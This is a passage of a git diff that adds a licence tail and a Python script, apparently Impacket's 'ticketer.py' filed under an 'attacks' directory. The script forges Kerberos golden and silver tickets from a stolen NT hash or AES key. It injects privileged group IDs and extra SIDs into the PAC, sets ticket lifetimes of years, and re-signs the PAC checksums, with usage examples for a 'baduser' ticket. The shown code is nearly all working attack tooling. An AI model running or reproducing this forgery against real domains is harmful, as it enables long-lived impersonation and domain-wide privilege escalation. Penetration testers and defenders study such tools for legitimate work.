+DISCLAIMED. 
IN NO EVENT SHALL THE APACHE SOFTWARE FOUNDATION OR +ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, +SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT +LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF +USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND +ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT +OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF +SUCH DAMAGE. + + + +Smb.py and nmb.py are based on Pysmb by Michael Teo +(https://miketeo.net/projects/pysmb/), and are distributed under the +following license: + +This software is provided 'as-is', without any express or implied +warranty. In no event will the author be held liable for any damages +arising from the use of this software. + +Permission is granted to anyone to use this software for any purpose, +including commercial applications, and to alter it and redistribute it +freely, subject to the following restrictions: + +1. The origin of this software must not be misrepresented; you must + not claim that you wrote the original software. If you use this + software in a product, an acknowledgment in the product + documentation would be appreciated but is not required. + +2. Altered source versions must be plainly marked as such, and must + not be misrepresented as being the original software. + +3. This notice cannot be removed or altered from any source + distribution. diff --git a/ade/attacks/ticketer/__init__.py b/ade/attacks/ticketer/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/ade/attacks/ticketer/ticketer.py b/ade/attacks/ticketer/ticketer.py new file mode 100644 index 0000000..13dbba3 --- /dev/null +++ b/ade/attacks/ticketer/ticketer.py @@ -0,0 +1,818 @@ +#!/usr/bin/env python3 +# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved. 
+# +# This software is provided under under a slightly modified version +# of the Apache Software License. See the accompanying LICENSE file +# for more information. +# +# Author: +# Alberto Solino (@agsolino) +# +# Description: +# This script will create TGT/TGS tickets from scratch or based on a template (legally requested from the KDC) +# allowing you to customize some of the parameters set inside the PAC_LOGON_INFO structure, in particular the +# groups, extrasids, etc. +# Tickets duration is fixed to 10 years from now (although you can manually change it) +# +# References: +# Original presentation at BlackHat USA 2014 by @gentilkiwi and @passingthehash: +# (https://www.slideshare.net/gentilkiwi/abusing-microsoft-kerberos-sorry-you-guys-dont-get-it) +# Original implementation by Benjamin Delpy (@gentilkiwi) in mimikatz +# (https://github.com/gentilkiwi/mimikatz) +# +# Examples: +# ./ticketer.py -nthash -domain-sid -domain baduser +# +# will create and save a golden ticket for user 'baduser' that will be all encrypted/signed used RC4. +# If you specify -aesKey instead of -ntHash everything will be encrypted using AES128 or AES256 +# (depending on the key specified). No traffic is generated against the KDC. Ticket will be saved as +# baduser.ccache. +# +# ./ticketer.py -nthash -aesKey -domain-sid -domain +# -request -user -password baduser +# +# will first authenticate against the KDC (using -user/-password) and get a TGT that will be used +# as template for customization. Whatever encryption algorithms used on that ticket will be honored, +# hence you might need to specify both -nthash and -aesKey data. Ticket will be generated for 'baduser' and saved +# as baduser.ccache. 
+# +# ToDo: +# [X] Silver tickets still not implemented - DONE by @machosec and fixes by @br4nsh +# [ ] When -request is specified, we could ask for a user2user ticket and also populate the received PAC +# +from __future__ import division +from __future__ import print_function +import argparse +import datetime +import logging +import random +import string +import sys +from calendar import timegm +from time import strptime +from binascii import unhexlify + +from pyasn1.codec.der import encoder, decoder +from pyasn1.type.univ import noValue + +from impacket import version +from impacket.dcerpc.v5.dtypes import RPC_SID +from impacket.dcerpc.v5.ndr import NDRULONG +from impacket.dcerpc.v5.samr import NULL, GROUP_MEMBERSHIP, SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, \ + SE_GROUP_ENABLED, USER_NORMAL_ACCOUNT, USER_DONT_EXPIRE_PASSWORD +from impacket.examples import logger +from impacket.krb5.asn1 import AS_REP, TGS_REP, ETYPE_INFO2, AuthorizationData, EncTicketPart, EncASRepPart, EncTGSRepPart +from impacket.krb5.constants import ApplicationTagNumbers, PreAuthenticationDataTypes, EncryptionTypes, \ + PrincipalNameType, ProtocolVersionNumber, TicketFlags, encodeFlags, ChecksumTypes, AuthorizationDataType, \ + KERB_NON_KERB_CKSUM_SALT +from impacket.krb5.keytab import Keytab +from impacket.krb5.crypto import Key, _enctype_table +from impacket.krb5.crypto import _checksum_table, Enctype +from impacket.krb5.pac import KERB_SID_AND_ATTRIBUTES, PAC_SIGNATURE_DATA, PAC_INFO_BUFFER, PAC_LOGON_INFO, \ + PAC_CLIENT_INFO_TYPE, PAC_SERVER_CHECKSUM, PAC_PRIVSVR_CHECKSUM, PACTYPE, PKERB_SID_AND_ATTRIBUTES_ARRAY, \ + VALIDATION_INFO, PAC_CLIENT_INFO, KERB_VALIDATION_INFO +from impacket.krb5.types import KerberosTime, Principal +from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS + + +class TICKETER: + def __init__(self, target, password, domain, options): + self.__password = password + self.__target = target + self.__domain = domain + self.__options = options + 
if options.spn: + spn = options.spn.split('/') + self.__service = spn[0] + self.__server = spn[1] + if options.keytab is not None: + self.loadKeysFromKeytab(options.keytab) + + # we are creating a golden ticket + else: + self.__service = 'krbtgt' + self.__server = self.__domain + + @staticmethod + def getFileTime(t): + t *= 10000000 + t += 116444736000000000 + return t + + def loadKeysFromKeytab(self, filename): + keytab = Keytab.loadFile(filename) + keyblock = keytab.getKey("%s@%s" % (options.spn, self.__domain)) + if keyblock: + if keyblock["keytype"] == Enctype.AES256 or keyblock["keytype"] == Enctype.AES128: + options.aesKey = keyblock.hexlifiedValue() + elif keyblock["keytype"] == Enctype.RC4: + options.nthash = keyblock.hexlifiedValue() + else: + logging.warning("No matching key for SPN '%s' in given keytab found!", options.spn) + + def createBasicValidationInfo(self): + # 1) KERB_VALIDATION_INFO + kerbdata = KERB_VALIDATION_INFO() + + aTime = timegm(datetime.datetime.utcnow().timetuple()) + unixTime = self.getFileTime(aTime) + + kerbdata['LogonTime']['dwLowDateTime'] = unixTime & 0xffffffff + kerbdata['LogonTime']['dwHighDateTime'] = unixTime >> 32 + + # LogoffTime: A FILETIME structure that contains the time the client's logon + # session should expire. If the session should not expire, this structure + # SHOULD have the dwHighDateTime member set to 0x7FFFFFFF and the dwLowDateTime + # member set to 0xFFFFFFFF. A recipient of the PAC SHOULD<7> use this value as + # an indicator of when to warn the user that the allowed time is due to expire. + kerbdata['LogoffTime']['dwLowDateTime'] = 0xFFFFFFFF + kerbdata['LogoffTime']['dwHighDateTime'] = 0x7FFFFFFF + + # KickOffTime: A FILETIME structure that contains LogoffTime minus the user + # account's forceLogoff attribute ([MS-ADA1] section 2.233) value. 
If the + # client should not be logged off, this structure SHOULD have the dwHighDateTime + # member set to 0x7FFFFFFF and the dwLowDateTime member set to 0xFFFFFFFF. + # The Kerberos service ticket end time is a replacement for KickOffTime. + # The service ticket lifetime SHOULD NOT be set longer than the KickOffTime of + # an account. A recipient of the PAC SHOULD<8> use this value as the indicator + # of when the client should be forcibly disconnected. + kerbdata['KickOffTime']['dwLowDateTime'] = 0xFFFFFFFF + kerbdata['KickOffTime']['dwHighDateTime'] = 0x7FFFFFFF + + kerbdata['PasswordLastSet']['dwLowDateTime'] = unixTime & 0xffffffff + kerbdata['PasswordLastSet']['dwHighDateTime'] = unixTime >> 32 + + kerbdata['PasswordCanChange']['dwLowDateTime'] = 0 + kerbdata['PasswordCanChange']['dwHighDateTime'] = 0 + + # PasswordMustChange: A FILETIME structure that contains the time at which + # theclient's password expires. If the password will not expire, this + # structure MUST have the dwHighDateTime member set to 0x7FFFFFFF and the + # dwLowDateTime member set to 0xFFFFFFFF. + kerbdata['PasswordMustChange']['dwLowDateTime'] = 0xFFFFFFFF + kerbdata['PasswordMustChange']['dwHighDateTime'] = 0x7FFFFFFF + + kerbdata['EffectiveName'] = self.__target + kerbdata['FullName'] = '' + kerbdata['LogonScript'] = '' + kerbdata['ProfilePath'] = '' + kerbdata['HomeDirectory'] = '' + kerbdata['HomeDirectoryDrive'] = '' + kerbdata['LogonCount'] = 500 + kerbdata['BadPasswordCount'] = 0 + kerbdata['UserId'] = int(self.__options.user_id) + kerbdata['PrimaryGroupId'] = 513 + + # Our Golden Well-known groups! 
:) + groups = self.__options.groups.split(',') + kerbdata['GroupCount'] = len(groups) + + for group in groups: + groupMembership = GROUP_MEMBERSHIP() + groupId = NDRULONG() + groupId['Data'] = int(group) + groupMembership['RelativeId'] = groupId + groupMembership['Attributes'] = SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED + kerbdata['GroupIds'].append(groupMembership) + + kerbdata['UserFlags'] = 0 + kerbdata['UserSessionKey'] = b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + kerbdata['LogonServer'] = '' + kerbdata['LogonDomainName'] = self.__domain.upper() + kerbdata['LogonDomainId'].fromCanonical(self.__options.domain_sid) + kerbdata['LMKey'] = b'\x00\x00\x00\x00\x00\x00\x00\x00' + kerbdata['UserAccountControl'] = USER_NORMAL_ACCOUNT | USER_DONT_EXPIRE_PASSWORD + kerbdata['SubAuthStatus'] = 0 + kerbdata['LastSuccessfulILogon']['dwLowDateTime'] = 0 + kerbdata['LastSuccessfulILogon']['dwHighDateTime'] = 0 + kerbdata['LastFailedILogon']['dwLowDateTime'] = 0 + kerbdata['LastFailedILogon']['dwHighDateTime'] = 0 + kerbdata['FailedILogonCount'] = 0 + kerbdata['Reserved3'] = 0 + + kerbdata['ResourceGroupDomainSid'] = NULL + kerbdata['ResourceGroupCount'] = 0 + kerbdata['ResourceGroupIds'] = NULL + + validationInfo = VALIDATION_INFO() + validationInfo['Data'] = kerbdata + + return validationInfo + + def createBasicPac(self, kdcRep): + validationInfo = self.createBasicValidationInfo() + pacInfos = {} + pacInfos[PAC_LOGON_INFO] = validationInfo.getData() + validationInfo.getDataReferents() + srvCheckSum = PAC_SIGNATURE_DATA() + privCheckSum = PAC_SIGNATURE_DATA() + + if kdcRep['ticket']['enc-part']['etype'] == EncryptionTypes.rc4_hmac.value: + srvCheckSum['SignatureType'] = ChecksumTypes.hmac_md5.value + privCheckSum['SignatureType'] = ChecksumTypes.hmac_md5.value + srvCheckSum['Signature'] = b'\x00' * 16 + privCheckSum['Signature'] = b'\x00' * 16 + else: + srvCheckSum['Signature'] = b'\x00' * 12 + privCheckSum['Signature'] = 
b'\x00' * 12 + if len(self.__options.aesKey) == 64: + srvCheckSum['SignatureType'] = ChecksumTypes.hmac_sha1_96_aes256.value + privCheckSum['SignatureType'] = ChecksumTypes.hmac_sha1_96_aes256.value + else: + srvCheckSum['SignatureType'] = ChecksumTypes.hmac_sha1_96_aes128.value + privCheckSum['SignatureType'] = ChecksumTypes.hmac_sha1_96_aes128.value + + pacInfos[PAC_SERVER_CHECKSUM] = srvCheckSum.getData() + pacInfos[PAC_PRIVSVR_CHECKSUM] = privCheckSum.getData() + + clientInfo = PAC_CLIENT_INFO() + clientInfo['Name'] = self.__target.encode('utf-16le') + clientInfo['NameLength'] = len(clientInfo['Name']) + pacInfos[PAC_CLIENT_INFO_TYPE] = clientInfo.getData() + + return pacInfos + + def createBasicTicket(self): + if self.__options.request is True: + if self.__domain == self.__server: + logging.info('Requesting TGT to target domain to use as basis') + else: + logging.info('Requesting TGT/TGS to target domain to use as basis') + + if self.__options.hashes is not None: + lmhash, nthash = self.__options.hashes.split(':') + else: + lmhash = '' + nthash = '' + userName = Principal(self.__options.user, type=PrincipalNameType.NT_PRINCIPAL.value) + tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain, + unhexlify(lmhash), unhexlify(nthash), None, + self.__options.dc_ip) + if self.__domain == self.__server: + kdcRep = decoder.decode(tgt, asn1Spec=AS_REP())[0] + else: + serverName = Principal(self.__options.spn, type=PrincipalNameType.NT_SRV_INST.value) + tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, self.__domain, None, tgt, cipher, + sessionKey) + kdcRep = decoder.decode(tgs, asn1Spec=TGS_REP())[0] + + # Let's check we have all the necessary data based on the ciphers used. 
Boring checks + ticketCipher = int(kdcRep['ticket']['enc-part']['etype']) + encPartCipher = int(kdcRep['enc-part']['etype']) + + if (ticketCipher == EncryptionTypes.rc4_hmac.value or encPartCipher == EncryptionTypes.rc4_hmac.value) and \ + self.__options.nthash is None: + logging.critical('rc4_hmac is used in this ticket and you haven\'t specified the -nthash parameter. ' + 'Can\'t continue ( or try running again w/o the -request option)') + return None, None + + if (ticketCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value or + encPartCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value) and \ + self.__options.aesKey is None: + logging.critical( + 'aes128_cts_hmac_sha1_96 is used in this ticket and you haven\'t specified the -aesKey parameter. ' + 'Can\'t continue (or try running again w/o the -request option)') + return None, None + + if (ticketCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value or + encPartCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value) and \ + self.__options.aesKey is not None and len(self.__options.aesKey) > 32: + logging.critical( + 'aes128_cts_hmac_sha1_96 is used in this ticket and the -aesKey you specified is not aes128. ' + 'Can\'t continue (or try running again w/o the -request option)') + return None, None + + if (ticketCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value or + encPartCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value) and self.__options.aesKey is None: + logging.critical( + 'aes256_cts_hmac_sha1_96 is used in this ticket and you haven\'t specified the -aesKey parameter. ' + 'Can\'t continue (or try running again w/o the -request option)') + return None, None + + if ( ticketCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value or + encPartCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value) and \ + self.__options.aesKey is not None and len(self.__options.aesKey) < 64: + logging.critical( + 'aes256_cts_hmac_sha1_96 is used in this ticket and the -aesKey you specified is not aes256. 
' + 'Can\'t continue') + return None, None + kdcRep['cname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value + kdcRep['cname']['name-string'] = noValue + kdcRep['cname']['name-string'][0] = self.__target + + else: + logging.info('Creating basic skeleton ticket and PAC Infos') + if self.__domain == self.__server: + kdcRep = AS_REP() + kdcRep['msg-type'] = ApplicationTagNumbers.AS_REP.value + else: + kdcRep = TGS_REP() + kdcRep['msg-type'] = ApplicationTagNumbers.TGS_REP.value + kdcRep['pvno'] = 5 + if self.__options.nthash is None: + kdcRep['padata'] = noValue + kdcRep['padata'][0] = noValue + kdcRep['padata'][0]['padata-type'] = PreAuthenticationDataTypes.PA_ETYPE_INFO2.value + + etype2 = ETYPE_INFO2() + etype2[0] = noValue + if len(self.__options.aesKey) == 64: + etype2[0]['etype'] = EncryptionTypes.aes256_cts_hmac_sha1_96.value + else: + etype2[0]['etype'] = EncryptionTypes.aes128_cts_hmac_sha1_96.value + etype2[0]['salt'] = '%s%s' % (self.__domain.upper(), self.__target) + encodedEtype2 = encoder.encode(etype2) + + kdcRep['padata'][0]['padata-value'] = encodedEtype2 + + kdcRep['crealm'] = self.__domain.upper() + kdcRep['cname'] = noValue + kdcRep['cname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value + kdcRep['cname']['name-string'] = noValue + kdcRep['cname']['name-string'][0] = self.__target + + kdcRep['ticket'] = noValue + kdcRep['ticket']['tkt-vno'] = ProtocolVersionNumber.pvno.value + kdcRep['ticket']['realm'] = self.__domain.upper() + kdcRep['ticket']['sname'] = noValue + kdcRep['ticket']['sname']['name-string'] = noValue + kdcRep['ticket']['sname']['name-string'][0] = self.__service + + if self.__domain == self.__server: + kdcRep['ticket']['sname']['name-type'] = PrincipalNameType.NT_SRV_INST.value + kdcRep['ticket']['sname']['name-string'][1] = self.__domain.upper() + else: + kdcRep['ticket']['sname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value + kdcRep['ticket']['sname']['name-string'][1] = self.__server + + 
kdcRep['ticket']['enc-part'] = noValue + kdcRep['ticket']['enc-part']['kvno'] = 2 + kdcRep['enc-part'] = noValue + if self.__options.nthash is None: + if len(self.__options.aesKey) == 64: + kdcRep['ticket']['enc-part']['etype'] = EncryptionTypes.aes256_cts_hmac_sha1_96.value + kdcRep['enc-part']['etype'] = EncryptionTypes.aes256_cts_hmac_sha1_96.value + else: + kdcRep['ticket']['enc-part']['etype'] = EncryptionTypes.aes128_cts_hmac_sha1_96.value + kdcRep['enc-part']['etype'] = EncryptionTypes.aes128_cts_hmac_sha1_96.value + else: + kdcRep['ticket']['enc-part']['etype'] = EncryptionTypes.rc4_hmac.value + kdcRep['enc-part']['etype'] = EncryptionTypes.rc4_hmac.value + + kdcRep['enc-part']['kvno'] = 2 + kdcRep['enc-part']['cipher'] = noValue + + pacInfos = self.createBasicPac(kdcRep) + + return kdcRep, pacInfos + + def customizeTicket(self, kdcRep, pacInfos): + logging.info('Customizing ticket for %s/%s' % (self.__domain, self.__target)) + encTicketPart = EncTicketPart() + + flags = list() + flags.append(TicketFlags.forwardable.value) + flags.append(TicketFlags.proxiable.value) + flags.append(TicketFlags.renewable.value) + if self.__domain == self.__server: + flags.append(TicketFlags.initial.value) + flags.append(TicketFlags.pre_authent.value) + encTicketPart['flags'] = encodeFlags(flags) + encTicketPart['key'] = noValue + encTicketPart['key']['keytype'] = kdcRep['ticket']['enc-part']['etype'] + + if encTicketPart['key']['keytype'] == EncryptionTypes.aes128_cts_hmac_sha1_96.value: + encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(16)]) + elif encTicketPart['key']['keytype'] == EncryptionTypes.aes256_cts_hmac_sha1_96.value: + encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(32)]) + else: + encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(16)]) + + encTicketPart['crealm'] = self.__domain.upper() + encTicketPart['cname'] = noValue + 
encTicketPart['cname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value + encTicketPart['cname']['name-string'] = noValue + encTicketPart['cname']['name-string'][0] = self.__target + + encTicketPart['transited'] = noValue + encTicketPart['transited']['tr-type'] = 0 + encTicketPart['transited']['contents'] = '' + + encTicketPart['authtime'] = KerberosTime.to_asn1(datetime.datetime.utcnow()) + encTicketPart['starttime'] = KerberosTime.to_asn1(datetime.datetime.utcnow()) + # Let's extend the ticket's validity a lil bit + ticketDuration = datetime.datetime.utcnow() + datetime.timedelta(days=int(self.__options.duration)) + encTicketPart['endtime'] = KerberosTime.to_asn1(ticketDuration) + encTicketPart['renew-till'] = KerberosTime.to_asn1(ticketDuration) + encTicketPart['authorization-data'] = noValue + encTicketPart['authorization-data'][0] = noValue + encTicketPart['authorization-data'][0]['ad-type'] = AuthorizationDataType.AD_IF_RELEVANT.value + encTicketPart['authorization-data'][0]['ad-data'] = noValue + + # Let's locate the KERB_VALIDATION_INFO and Checksums + if PAC_LOGON_INFO in pacInfos: + data = pacInfos[PAC_LOGON_INFO] + validationInfo = VALIDATION_INFO() + validationInfo.fromString(pacInfos[PAC_LOGON_INFO]) + lenVal = len(validationInfo.getData()) + validationInfo.fromStringReferents(data, lenVal) + + aTime = timegm(strptime(str(encTicketPart['authtime']), '%Y%m%d%H%M%SZ')) + + unixTime = self.getFileTime(aTime) + + kerbdata = KERB_VALIDATION_INFO() + + kerbdata['LogonTime']['dwLowDateTime'] = unixTime & 0xffffffff + kerbdata['LogonTime']['dwHighDateTime'] = unixTime >> 32 + + # Let's adjust username and other data + validationInfo['Data']['LogonDomainName'] = self.__domain.upper() + validationInfo['Data']['EffectiveName'] = self.__target + # Our Golden Well-known groups! 
:) + groups = self.__options.groups.split(',') + validationInfo['Data']['GroupIds'] = list() + validationInfo['Data']['GroupCount'] = len(groups) + + for group in groups: + groupMembership = GROUP_MEMBERSHIP() + groupId = NDRULONG() + groupId['Data'] = int(group) + groupMembership['RelativeId'] = groupId + groupMembership['Attributes'] = SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED + validationInfo['Data']['GroupIds'].append(groupMembership) + + # Let's add the extraSid + if self.__options.extra_sid is not None: + extrasids = self.__options.extra_sid.split(',') + if validationInfo['Data']['SidCount'] == 0: + # Let's be sure user's flag specify we have extra sids. + validationInfo['Data']['UserFlags'] |= 0x20 + validationInfo['Data']['ExtraSids'] = PKERB_SID_AND_ATTRIBUTES_ARRAY() + for extrasid in extrasids: + validationInfo['Data']['SidCount'] += 1 + + sidRecord = KERB_SID_AND_ATTRIBUTES() + + sid = RPC_SID() + sid.fromCanonical(extrasid) + + sidRecord['Sid'] = sid + sidRecord['Attributes'] = SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED + + # And, let's append the magicSid + validationInfo['Data']['ExtraSids'].append(sidRecord) + else: + validationInfo['Data']['ExtraSids'] = NULL + + validationInfoBlob = validationInfo.getData() + validationInfo.getDataReferents() + pacInfos[PAC_LOGON_INFO] = validationInfoBlob + + if logging.getLogger().level == logging.DEBUG: + logging.debug('VALIDATION_INFO after making it gold') + validationInfo.dump() + print ('\n') + else: + raise Exception('PAC_LOGON_INFO not found! 
Aborting') + + logging.info('\tPAC_LOGON_INFO') + + # Let's now clear the checksums + if PAC_SERVER_CHECKSUM in pacInfos: + serverChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_SERVER_CHECKSUM]) + if serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value: + serverChecksum['Signature'] = '\x00' * 12 + elif serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value: + serverChecksum['Signature'] = '\x00' * 12 + else: + serverChecksum['Signature'] = '\x00' * 16 + pacInfos[PAC_SERVER_CHECKSUM] = serverChecksum.getData() + else: + raise Exception('PAC_SERVER_CHECKSUM not found! Aborting') + + if PAC_PRIVSVR_CHECKSUM in pacInfos: + privSvrChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_PRIVSVR_CHECKSUM]) + privSvrChecksum['Signature'] = '\x00' * 12 + if privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value: + privSvrChecksum['Signature'] = '\x00' * 12 + elif privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value: + privSvrChecksum['Signature'] = '\x00' * 12 + else: + privSvrChecksum['Signature'] = '\x00' * 16 + pacInfos[PAC_PRIVSVR_CHECKSUM] = privSvrChecksum.getData() + else: + raise Exception('PAC_PRIVSVR_CHECKSUM not found! Aborting') + + if PAC_CLIENT_INFO_TYPE in pacInfos: + pacClientInfo = PAC_CLIENT_INFO(pacInfos[PAC_CLIENT_INFO_TYPE]) + pacClientInfo['ClientId'] = unixTime + pacInfos[PAC_CLIENT_INFO_TYPE] = pacClientInfo.getData() + else: + raise Exception('PAC_CLIENT_INFO_TYPE not found! 
Aborting') + + logging.info('\tPAC_CLIENT_INFO_TYPE') + logging.info('\tEncTicketPart') + + if self.__domain == self.__server: + encRepPart = EncASRepPart() + else: + encRepPart = EncTGSRepPart() + + encRepPart['key'] = noValue + encRepPart['key']['keytype'] = encTicketPart['key']['keytype'] + encRepPart['key']['keyvalue'] = encTicketPart['key']['keyvalue'] + encRepPart['last-req'] = noValue + encRepPart['last-req'][0] = noValue + encRepPart['last-req'][0]['lr-type'] = 0 + encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow()) + encRepPart['nonce'] = 123456789 + encRepPart['key-expiration'] = KerberosTime.to_asn1(ticketDuration) + encRepPart['flags'] = encodeFlags(flags) + encRepPart['authtime'] = str(encTicketPart['authtime']) + encRepPart['endtime'] = str(encTicketPart['endtime']) + encRepPart['starttime'] = str(encTicketPart['starttime']) + encRepPart['renew-till'] = str(encTicketPart['renew-till']) + encRepPart['srealm'] = self.__domain.upper() + encRepPart['sname'] = noValue + encRepPart['sname']['name-string'] = noValue + encRepPart['sname']['name-string'][0] = self.__service + + if self.__domain == self.__server: + encRepPart['sname']['name-type'] = PrincipalNameType.NT_SRV_INST.value + encRepPart['sname']['name-string'][1] = self.__domain.upper() + logging.info('\tEncAsRepPart') + else: + encRepPart['sname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value + encRepPart['sname']['name-string'][1] = self.__server + logging.info('\tEncTGSRepPart') + + return encRepPart, encTicketPart, pacInfos + + def signEncryptTicket(self, kdcRep, encASorTGSRepPart, encTicketPart, pacInfos): + logging.info('Signing/Encrypting final ticket') + + # We changed everything we needed to make us special. 
Now let's repack and calculate checksums + validationInfoBlob = pacInfos[PAC_LOGON_INFO] + validationInfoAlignment = b'\x00' * (((len(validationInfoBlob) + 7) // 8 * 8) - len(validationInfoBlob)) + + pacClientInfoBlob = pacInfos[PAC_CLIENT_INFO_TYPE] + pacClientInfoAlignment = b'\x00' * (((len(pacClientInfoBlob) + 7) // 8 * 8) - len(pacClientInfoBlob)) + + serverChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_SERVER_CHECKSUM]) + serverChecksumBlob = pacInfos[PAC_SERVER_CHECKSUM] + serverChecksumAlignment = b'\x00' * (((len(serverChecksumBlob) + 7) // 8 * 8) - len(serverChecksumBlob)) + + privSvrChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_PRIVSVR_CHECKSUM]) + privSvrChecksumBlob = pacInfos[PAC_PRIVSVR_CHECKSUM] + privSvrChecksumAlignment = b'\x00' * (((len(privSvrChecksumBlob) + 7) // 8 * 8) - len(privSvrChecksumBlob)) + + # The offset are set from the beginning of the PAC_TYPE + # [MS-PAC] 2.4 PAC_INFO_BUFFER + offsetData = 8 + len(PAC_INFO_BUFFER().getData()) * 4 + + # Let's build the PAC_INFO_BUFFER for each one of the elements + validationInfoIB = PAC_INFO_BUFFER() + validationInfoIB['ulType'] = PAC_LOGON_INFO + validationInfoIB['cbBufferSize'] = len(validationInfoBlob) + validationInfoIB['Offset'] = offsetData + offsetData = (offsetData + validationInfoIB['cbBufferSize'] + 7) // 8 * 8 + + pacClientInfoIB = PAC_INFO_BUFFER() + pacClientInfoIB['ulType'] = PAC_CLIENT_INFO_TYPE + pacClientInfoIB['cbBufferSize'] = len(pacClientInfoBlob) + pacClientInfoIB['Offset'] = offsetData + offsetData = (offsetData + pacClientInfoIB['cbBufferSize'] + 7) // 8 * 8 + + serverChecksumIB = PAC_INFO_BUFFER() + serverChecksumIB['ulType'] = PAC_SERVER_CHECKSUM + serverChecksumIB['cbBufferSize'] = len(serverChecksumBlob) + serverChecksumIB['Offset'] = offsetData + offsetData = (offsetData + serverChecksumIB['cbBufferSize'] + 7) // 8 * 8 + + privSvrChecksumIB = PAC_INFO_BUFFER() + privSvrChecksumIB['ulType'] = PAC_PRIVSVR_CHECKSUM + privSvrChecksumIB['cbBufferSize'] = len(privSvrChecksumBlob) 
+ privSvrChecksumIB['Offset'] = offsetData + # offsetData = (offsetData+privSvrChecksumIB['cbBufferSize'] + 7) //8 *8 + + # Building the PAC_TYPE as specified in [MS-PAC] + buffers = validationInfoIB.getData() + pacClientInfoIB.getData() + serverChecksumIB.getData() + \ + privSvrChecksumIB.getData() + validationInfoBlob + validationInfoAlignment + \ + pacInfos[PAC_CLIENT_INFO_TYPE] + pacClientInfoAlignment + buffersTail = serverChecksumBlob + serverChecksumAlignment + privSvrChecksum.getData() + privSvrChecksumAlignment + + pacType = PACTYPE() + pacType['cBuffers'] = 4 + pacType['Version'] = 0 + pacType['Buffers'] = buffers + buffersTail + + blobToChecksum = pacType.getData() + + checkSumFunctionServer = _checksum_table[serverChecksum['SignatureType']] + if serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value: + keyServer = Key(Enctype.AES256, unhexlify(self.__options.aesKey)) + elif serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value: + keyServer = Key(Enctype.AES128, unhexlify(self.__options.aesKey)) + elif serverChecksum['SignatureType'] == ChecksumTypes.hmac_md5.value: + keyServer = Key(Enctype.RC4, unhexlify(self.__options.nthash)) + else: + raise Exception('Invalid Server checksum type 0x%x' % serverChecksum['SignatureType']) + + checkSumFunctionPriv = _checksum_table[privSvrChecksum['SignatureType']] + if privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value: + keyPriv = Key(Enctype.AES256, unhexlify(self.__options.aesKey)) + elif privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value: + keyPriv = Key(Enctype.AES128, unhexlify(self.__options.aesKey)) + elif privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_md5.value: + keyPriv = Key(Enctype.RC4, unhexlify(self.__options.nthash)) + else: + raise Exception('Invalid Priv checksum type 0x%x' % serverChecksum['SignatureType']) + + serverChecksum['Signature'] = checkSumFunctionServer.checksum(keyServer, 
